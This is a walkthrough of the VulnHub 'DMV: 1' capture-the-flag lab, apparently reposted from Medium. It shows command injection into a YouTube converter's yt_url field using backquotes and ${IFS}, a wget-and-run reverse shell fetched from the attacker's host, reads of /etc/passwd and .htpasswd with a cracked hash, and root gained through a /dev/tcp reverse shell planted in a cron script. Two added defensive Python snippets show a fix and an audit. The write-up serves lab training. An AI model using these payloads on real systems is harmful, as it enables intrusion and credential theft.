Original WriteUp:
https://medium.com/p/vulnhub-dmv-1-writeup-walkthrough-c1e12e6659f9
VulnHub Link: DMV: 1 ~ VulnHub
Description:
It is a simple machine that replicates a real scenario that I found. The goal is to get two flags, one that is in the secret folder and the other that can only be read by the root user. This works better with VirtualBox rather than VMware.
The VirtualBox IP: 192.168.56.101
So as a start, and as always, a quick nmap scan:
nmap -sC -sV 192.168.56.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 16:25 GMT Daylight Time
Nmap scan report for 192.168.56.101
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:28:AD:53 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
We have only 2 open ports!
22 (ssh) ==> OpenSSH 7.6p1
80 (http) ==> Apache httpd 2.4.29
and the nmap output shows us that this is an Ubuntu server.
Let's see what we have on port 80 (the web page).
We have some kind of YouTube to MP3 converter!
Let's try to put something in the video ID field and intercept the request using Burp Suite,
and here is the request sent from Burp Suite:
POST / HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.56.101/
Content-Length: 57
DNT: 1
Connection: close

yt_url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D123456
and the response was:
HTTP/1.1 200 OK
Date: Thu, 16 Apr 2020 15:28:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 392
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":1,"errors":"WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nERROR: Incomplete YouTube ID 123456. URL https://www.youtube.com/watch?v= 123456 looks truncated.\n","url_orginal":" https://www.youtube.com/watch?v=123456 ","output":"","result_url":"/tmp/downloads/5e9879861935f.mp3"}
So we have a POST request that takes the ID we enter and appends it to the YouTube URL.
It looks from the request parameter "yt_url" that we can replace the YouTube URL with something else!
But before that, the response contains an error of some kind! Let's google it and see what we find.
So the website is using a Python tool that allows you to convert and download YouTube videos to MP3,
and I quote from the GitHub link:
Command-line program to download videos from YouTube.com and other video sites
Before I started anything, I had to check the command list (the options) of this program (youtube-dl).
So let's try, via the Burp Suite Repeater, to print the version info (--version as shown below).
So the version was printed without errors, and the program is running version 2020.03.24 (not that old).
So from the commits, let's check what we have in this version, specifically looking for any bugs!
And if you want to look for bugs (I mean generally on GitHub), don't only search the commits of the current version; you have to check the more recent ones too ...
As you notice, we have Mar 23, 2020 and Apr 5, 2020 and more ... The last one is on Apr 11, 2020.
You can check manually: Commits · ytdl-org/youtube-dl · GitHub
Nothing looks suspicious, just some random updates and fixes ...
(I hope everything above is clear up to now!)
So let's go back to the command list and see if we can somehow execute commands on the system!
So let's go back to our Burp Suite Repeater and try this, changing the command to whoami.
Nothing! But something isn't normal: if you take a look at the url_original value in the response, you won't see
the 'whoami'. Maybe it's restricting some commands, or maybe it only takes what comes before the space? Let's URL-encode that and try (a space in URL encoding is +).
Nothing either! Still not showing the whoami. Let's write whoami without the --exec and without single quotes.
So the problem isn't in whoami. Let's write it with single quotes.
Now I'm 100% sure that the problem is with spaces, because I also tried sending more than 20 characters. Here is an example.
So for a quick and smart scan, let's send this over Intruder using a special characters list ...
The images below explain how to use the Intruder in Burp Suite:
- Configure the position where you want the payloads to be inserted (write anything, select it and click on Add)
- Copy the special characters list and paste it here (the Payloads section)
Now click on Start Attack. To compare the sent requests we should take a look at the Length column.
As you see, there are many different values; let's eliminate the 564 ones, because they all have the same error message, which is
{"status":1,"errors":"WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nERROR: u'!' is not a valid URL. Set --default-search "ytsearch" (or run youtube-dl "ytsearch:!" ) to search YouTube\n","url_orginal":"!","output":"","result_url":"/tmp/downloads/5e9881edeff6e.mp3"}
but the special cases have this:
{"status":2,"errors":" sh: 1: cannot open -f: No such file\n","url_orginal":"<","output":"","result_url":"/tmp/downloads/5e98820f668c1.mp3"}
Something is saying "sh". Let's go back to our Intruder and to the Options tab.
In the Grep - Match section clear all the values and add sh: 1 (or just sh:) and go back to the Results tab.
Now we have reduced the results to only 9 characters that bypass the program and let us use sh/bash commands ...
In the request we have the backquote or the grave accent.
If you don't know what a backquote does, read this (from the bash man page):
When the old-style backquote form of substitution is used, backslash retains its literal meaning except when followed by $, `, or \. The first backquote not preceded by a backslash terminates the command substitution. When using the $(command) form, all characters between the parentheses make up the command; none are treated specially.
Command substitutions may be nested. To nest when using the backquoted form, escape the inner backquotes with backslashes.
So to make things easier for you guys here is our new payload list
&
(
)
|
`
'
"
<
;
Let's run another Intruder attack, but this time let's include a command in backquotes: `id`
and the command was executed successfully, but the response isn't showing the full output of the command!
So if you scroll down to the responses of the other payloads, only one of them prints everything,
so we are going to use that one. Let's send it to our Repeater and start typing several commands.
As you see, everything works, but there is still the question of how to bypass the space restriction!
If we run ls -la and URL-encode it, we get an error message.
So I know a bash trick that lets you bypass WAFs and many other space restrictions:
replace the space with a special shell variable known as "${IFS}", the Internal Field Separator.
And here is a good bypass list I found on Google (I didn't try it, but they seem correct).
So the easiest way to use this, when only a few spaces are needed, is to start the Python SimpleHTTPServer, download our shell to this box and run it:
yt_url=%3ccd${IFS}/var/www/html/images/;wget${IFS}http://192.168.56.1:8080/rev.py;python${IFS}rev.py
images is a writable folder we found after using ls -la; we also have the tmp directory, and the main folder is writable too, but this is just to check if we can run 3 commands in one line using the ; separator. So let's check that our listener (nc) is up and execute the command ...
The response isn't returning anything, which means we are successfully connected to the shell.
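For contrast, here is how the same converter could have handed yt_url to youtube-dl without a shell ever seeing it. This is an added example, not the box's code or youtube-dl's: it assumes a hypothetical front end that only needs an 11-character video ID, and it rejects every payload used above.

```python
import re
import subprocess
from typing import List, Optional
from urllib.parse import parse_qs, urlparse

# Hypothetical hardened front end for the converter (not the DMV box's code). The box
# appended yt_url to a shell command line, which is why `<`, backquotes and ${IFS}
# reached sh. Here the input is reduced to an 11-character video ID and youtube-dl is
# started from an argv list, so no shell ever parses what the user typed.

YT_ID = re.compile(r"[A-Za-z0-9_-]{11}")        # YouTube video IDs: 11 chars of this set
YT_HOSTS = {"www.youtube.com", "youtube.com", "m.youtube.com", "youtu.be"}

def extract_video_id(yt_url: str) -> Optional[str]:
    """Return the video ID if yt_url is a well-formed YouTube URL, otherwise None."""
    try:
        u = urlparse(yt_url.strip())
    except ValueError:
        return None
    if u.scheme not in ("http", "https") or u.hostname not in YT_HOSTS:
        return None
    if u.hostname == "youtu.be":
        candidate = u.path.lstrip("/")            # https://youtu.be/<id>
    else:
        candidate = parse_qs(u.query).get("v", [""])[0]
    return candidate if YT_ID.fullmatch(candidate) else None

def build_argv(video_id: str, out_dir: str = "/tmp/downloads") -> List[str]:
    """youtube-dl argv as a list: no 'sh -c', so metacharacters are never interpreted."""
    if not YT_ID.fullmatch(video_id):
        raise ValueError("invalid video id")
    return ["youtube-dl", "--extract-audio", "--audio-format", "mp3",
            "--output", f"{out_dir}/%(id)s.%(ext)s", "--",
            f"https://www.youtube.com/watch?v={video_id}"]

def convert(yt_url: str) -> dict:
    """Same JSON shape as the box's response, with the injection path closed."""
    vid = extract_video_id(yt_url)
    if vid is None:
        return {"status": 1, "errors": "rejected: not a YouTube video URL",
                "url_orginal": yt_url, "output": "", "result_url": ""}
    proc = subprocess.run(build_argv(vid), capture_output=True, text=True)
    return {"status": proc.returncode, "errors": proc.stderr, "url_orginal": yt_url,
            "output": proc.stdout, "result_url": f"/tmp/downloads/{vid}.mp3"}
```

With the ID validated and no shell in the path, the 9 characters found by Intruder become ordinary bytes that never reach sh.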
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
dmv:x:1000:1000:dmv:/home/dmv:/bin/bash
Let's search for the first flag.
Going to the main directory (/var/www/html/),
you will find the first flag in the admin directory:
cat /var/www/html/admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}
and also a .htpasswd file:
cat /var/www/html/admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
If we crack the hash using hashcat we get jessie:
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/:jessie
Maybe this will be useful for the root part ...
Let's go to the ROOT part! (It's going to be short this time.)
I uploaded many enumeration tools like LinEnum and LinPEAS but couldn't find anything with them.
I tried to use the password we found for the user dmv, and nothing either!
I asked a friend who did the box before I downloaded it,
and he said look in cronjobs, but I still couldn't find a thing there!
Then I remembered that I saw a file in the /tmp/ directory named clean.sh with one line:
rm -rf downloads
So it's clear the bash script deletes the folder "downloads"!
So I modified it and put in this line:
bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'
and I ran my listener again on port 4444,
and I was lucky: we are r00t.
So another way to get root is using pspy, a process spy.
(All the releases are in the link above, for both 32-bit and 64-bit.)
From the command uname -a in your shell you'll determine the system CPU architecture:
Linux dmv 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64
Let's upload it to our shell, make it executable (chmod +x pspy64) and execute it.
So as you see, the task is executed each minute with root privileges, and our injected reverse shell is still being executed.
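This is the check a defender would run before a root cron job ever points at a file like /tmp/clean.sh. It is an added example, not from the box or from pspy: it parses system crontab lines, flags any entry whose script (or the directory holding it) is writable by other users, and uses a constructed clean.sh sample because the writeup does not show the box's real cron entry.

```python
import os
import shlex
import stat
import tempfile
from typing import List, Tuple
# Added audit helper, not from the DMV box: flag system crontab entries whose script (or
# its directory) is writable by users other than the owner, the weakness behind clean.sh.

INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}

def cron_command(line: str) -> str:
    """Command part of a system crontab line (5 time fields, user, command), else ''."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return ""                                 # blank, comment or VAR=value line
    fields = line.split(None, 6)
    return fields[6] if len(fields) == 7 else ""

def script_path(command: str) -> str:
    """File the entry executes: first token, or the argument after a known interpreter."""
    toks = shlex.split(command) if command else []
    if len(toks) > 1 and os.path.basename(toks[0]) in INTERPRETERS:
        return toks[1]
    return toks[0] if toks else ""

def writable_by_others(path: str) -> bool:
    """True if path is group/world writable, or its dir is world writable without sticky bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False                              # missing target is a different finding
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    dmode = os.stat(os.path.dirname(path) or ".").st_mode
    return bool(dmode & stat.S_IWOTH) and not (dmode & stat.S_ISVTX)

def audit_crontab(text: str) -> List[Tuple[str, str]]:
    """(script, crontab line) pairs whose script another user could rewrite."""
    pairs = ((script_path(cron_command(l)), l.strip()) for l in text.splitlines())
    return [(p, l) for p, l in pairs if os.path.isabs(p) and writable_by_others(p)]

def demo() -> Tuple[int, int]:
    # Constructed sample: a world-writable clean.sh in a private temp dir, then fixed to 0644.
    script = os.path.join(tempfile.mkdtemp(), "clean.sh")
    with open(script, "w") as f:
        f.write("rm -rf downloads\n")
    crontab = f"SHELL=/bin/sh\n# m h dom mon dow user command\n* * * * * root bash {script}\n"
    os.chmod(script, 0o666)
    before = len(audit_crontab(crontab))
    os.chmod(script, 0o644)
    return before, len(audit_crontab(crontab))
```

Entries such as @reboot or commands that cd first are not parsed by this small helper; feed it /etc/crontab and the files under /etc/cron.d and it reports (script, line) pairs that root should never be running from a user-writable location.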
I hope everything was clear, and excuse my English, I'm doing my best here.